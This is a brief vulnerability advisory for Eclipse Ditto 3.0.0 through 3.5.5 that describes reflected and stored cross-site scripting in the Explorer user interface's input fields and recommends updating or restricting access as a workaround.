Quirin Zießler

**Name of the Vulnerable Software and Affected Versions** Eclipse Ditto versions 3.0.0 through 3.5.5 **Description** The user input of several input fields of the Eclipse Ditto Explorer User Interface was not properly neutralized, making it vulnerable to both Reflected and Stored XSS (Cross Site Scripting). Several inputs were not persisted at the backend of Eclipse Ditto, but only in local browser storage, resulting in a Reflected XSS vulnerability. However, several other inputs were persisted at the backend of Eclipse Ditto, leading to a Stored XSS vulnerability. This means that authenticated and authorized users at Eclipse Ditto can persist Things in Ditto, which can cause scripts to be executed in the browser of other users when being displayed. **Recommendations** For Eclipse Ditto versions 3.0.0 through 3.5.5, update to a version that properly neutralizes user input to prevent Reflected and Stored XSS vulnerabilities. As a temporary workaround, consider restricting access to the Eclipse Ditto Explorer User Interface to minimize the risk of exploitation. Avoid using the vulnerable input fields in the Eclipse Ditto Explorer User Interface until the issue is resolved.